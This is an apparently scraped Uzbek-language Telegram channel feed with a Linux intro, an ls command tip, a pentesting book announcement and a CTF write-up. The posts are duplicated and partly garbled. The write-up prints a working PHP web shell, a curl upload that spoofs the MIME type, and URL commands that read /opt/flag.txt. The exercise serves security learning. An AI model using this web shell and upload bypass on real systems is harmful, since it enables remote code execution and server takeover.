🌞 Assalomu alaykum, do‘stlar!
🐧 Bugundan boshlab biz Linux Administratorligi bo‘yicha qiziqarli va foydali postlarni boshlab yuboramiz.
💡 Bu safarda siz:
🖥️ Linux serverlarini qanday o‘rnatishni,
⚙️ Xizmatlarni boshqarishni,
🔒 Xavfsizlikni ta’minlashni,
🌐 Tarmoqlarni sozlashni
qadam-baqadam o‘rganib borasiz.
🚀 Maqsadimiz — boshlovchidan professional administratorgacha yo‘lni birga bosib o‘tish!
🐧 Bugundan boshlab biz Linux Administratorligi bo‘yicha qiziqarli va foydali postlarni boshlab yuboramiz.
💡 Bu safarda siz:
🖥️ Linux serverlarini qanday o‘rnatishni,
⚙️ Xizmatlarni boshqarishni,
🔒 Xavfsizlikni ta’minlashni,
🌐 Tarmoqlarni sozlashni
qadam-baqadam o‘rganib borasiz.
🚀 Maqsadimiz — boshlovchidan professional administratorgacha yo‘lni birga bosib o‘tish!
👍2🍌1
🐧 Linux komandasi: ls
📝 Vazifasi: katalog ichidagi fayl va papkalarni ko‘rsatadi.
---
🔹 Eng ko‘p ishlatiladigan parametrlari:
📄 ls -l → kengaytirilgan ro‘yxat (ruxsatlar, egasi, o‘lchami, sana).
🕵️ ls -a → yashirin fayllarni ham ko‘rsatadi (. bilan boshlanadiganlar).
📂 ls -R → papkalarni rekursiv ko‘rsatadi (ichidagi papkalar bilan birga).
⏳ ls -t → fayllarni oxirgi o‘zgartirish vaqtiga ko‘ra saralaydi.
📏 ls -h → fayl hajmlarini odamga qulay shaklda (KB, MB, GB).
🌈 ls --color → fayl turlarini rangli qilib ajratadi.
📝 Vazifasi: katalog ichidagi fayl va papkalarni ko‘rsatadi.
---
🔹 Eng ko‘p ishlatiladigan parametrlari:
📄 ls -l → kengaytirilgan ro‘yxat (ruxsatlar, egasi, o‘lchami, sana).
🕵️ ls -a → yashirin fayllarni ham ko‘rsatadi (. bilan boshlanadiganlar).
📂 ls -R → papkalarni rekursiv ko‘rsatadi (ichidagi papkalar bilan birga).
⏳ ls -t → fayllarni oxirgi o‘zgartirish vaqtiga ko‘ra saralaydi.
📏 ls -h → fayl hajmlarini odamga qulay shaklda (KB, MB, GB).
🌈 ls --color → fayl turlarini rangli qilib ajratadi.
👍3🤬1
📖_Web_Pentesting_Boshlang‘ichdan_Professional_darajagacha.pdf
969.2 KB
🚀 Web Pentesting Guide kitobi tayyor!
Ushbu qo‘llanma orqali:
🔎 Web pentesting nima va nima uchun muhimligini o‘rganasiz
🛠 Asboblar: Nmap, Nikto, Dirsearch, Burp Suite ishlatishni bilib olasiz
⚡️ OWASP Top 10 zaifliklari haqida batafsil tushunchaga ega bo‘lasiz
💻 Har bir bosqich uchun amaliy laboratoriya mashqlarini bajarasiz
🧩 Kodlar, parametrlarga izoh va xavf darajalari sodda tilda tushuntirilgan
📖 Izohli lug‘at yordamida texnik atamalarni oson o‘zlashtirasiz
🏆 Boshlovchidan professionalgacha yo‘l xaritasi berilgan
👉 Endi bu kitobni bepul yuklab oling va o‘z bilimlaringizni keyingi bosqichga olib chiqing!
Ushbu qo‘llanma orqali:
🔎 Web pentesting nima va nima uchun muhimligini o‘rganasiz
🛠 Asboblar: Nmap, Nikto, Dirsearch, Burp Suite ishlatishni bilib olasiz
⚡️ OWASP Top 10 zaifliklari haqida batafsil tushunchaga ega bo‘lasiz
💻 Har bir bosqich uchun amaliy laboratoriya mashqlarini bajarasiz
🧩 Kodlar, parametrlarga izoh va xavf darajalari sodda tilda tushuntirilgan
📖 Izohli lug‘at yordamida texnik atamalarni oson o‘zlashtirasiz
🏆 Boshlovchidan professionalgacha yo‘l xaritasi berilgan
👉 Endi bu kitobni bepul yuklab oling va o‘z bilimlaringizni keyingi bosqichga olib chiqing!
👍3
CTF Write‑Up: File Upload Vulnerability — /opt Flag Extraction
Bugungi challange’da bizga quyidagi topshiriq berilgan edi:
“Identify the file upload vulnerability and read the flag from /opt/ directory.”
Target: http://web.mahadsec.net:45717/
Sayt oddiy profil sahifasi bo‘lib, foydalanuvchidan rasm yuklashni so‘raydi. Front-endda .jpg/.png/.gif filerlarga ruxsat berilgandek tuyuladi, ammo haqiqiy himoya upload.php ichida bo‘ladi.
🟩 1. Front-end Validation – Zaif joy
HTML kodini tahlil qilsak, unda faqat JavaScript orqali extension check ishlatilgan:
Bu faqat brauzerga ta’sir qiladi.
Biz esa curl yoki burpsuite orqali backendga to‘g‘ridan-to‘g‘ri fayl yuborsak, bu himoyani chetlab o‘ta olamiz.
🟩 2. Exploit strategiyasi – Fake MIME bilan WebShell yuklash
Ko‘p CTF’dagi kabi upload.php odatda:
faqat fayl nomi extensionini tekshiradi
MIME-type tekshirmaydi
ichidagi kodni filtrlamaydi
Shuning uchun biz PHP WebShellni JPEG sifatida ko‘rsatib, yuklab qo‘yamiz.
📌 WebShell (shell.php)
📌 Yuklash (Fake MIME)
Front-end tekshiruvi ishlamaydi → fayl muvaffaqiyatli yuklanadi.
🟩 3. Yuklangan fayl joylashuvini topish
Ko‘plab PHP upload serverlar faylni quyidagi joyga saqlaydi:
/uplo
htt
🟩 4. Remote Command Execution orqali Flag o‘qish
Endi tizimda buyruq bajara olamiz.
/opt katalogini ko‘ramiz:
/uplo
Bugungi challange’da bizga quyidagi topshiriq berilgan edi:
“Identify the file upload vulnerability and read the flag from /opt/ directory.”
Target: http://web.mahadsec.net:45717/
Sayt oddiy profil sahifasi bo‘lib, foydalanuvchidan rasm yuklashni so‘raydi. Front-endda .jpg/.png/.gif filerlarga ruxsat berilgandek tuyuladi, ammo haqiqiy himoya upload.php ichida bo‘ladi.
🟩 1. Front-end Validation – Zaif joy
HTML kodini tahlil qilsak, unda faqat JavaScript orqali extension check ishlatilgan:
var allowedExtensions = /(\.jpg|\.jpeg|\.png|\.gif)$/i;
Bu faqat brauzerga ta’sir qiladi.
Biz esa curl yoki burpsuite orqali backendga to‘g‘ridan-to‘g‘ri fayl yuborsak, bu himoyani chetlab o‘ta olamiz.
🟩 2. Exploit strategiyasi – Fake MIME bilan WebShell yuklash
Ko‘p CTF’dagi kabi upload.php odatda:
faqat fayl nomi extensionini tekshiradi
MIME-type tekshirmaydi
ichidagi kodni filtrlamaydi
Shuning uchun biz PHP WebShellni JPEG sifatida ko‘rsatib, yuklab qo‘yamiz.
📌 WebShell (shell.php)
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
📌 Yuklash (Fake MIME)
curl -X POST http://web.mahadsec.net:45717/upload.php \
-F "profile=@shell.php;type=image/jpeg"
Front-end tekshiruvi ishlamaydi → fayl muvaffaqiyatli yuklanadi.
🟩 3. Yuklangan fayl joylashuvini topish
Ko‘plab PHP upload serverlar faylni quyidagi joyga saqlaydi:
/uplo
ads/
Shu sababli sinov:htt
p://web.mahadsec.net:45717/uploads/shell.php
Agar sahifa ochilsa → RCE qo‘limizda.🟩 4. Remote Command Execution orqali Flag o‘qish
Endi tizimda buyruq bajara olamiz.
/opt katalogini ko‘ramiz:
/uplo
ads/shell.php?cmd=ls%20/opt
Flagni o‘qish:/uploads/shell.php?cmd=cat%20/opt/flag.txt
Va flag: MS{cl13nt_s1d3_v4l1d4t10n_l34d_t0_rc3}1❤1👍1🔥1👏1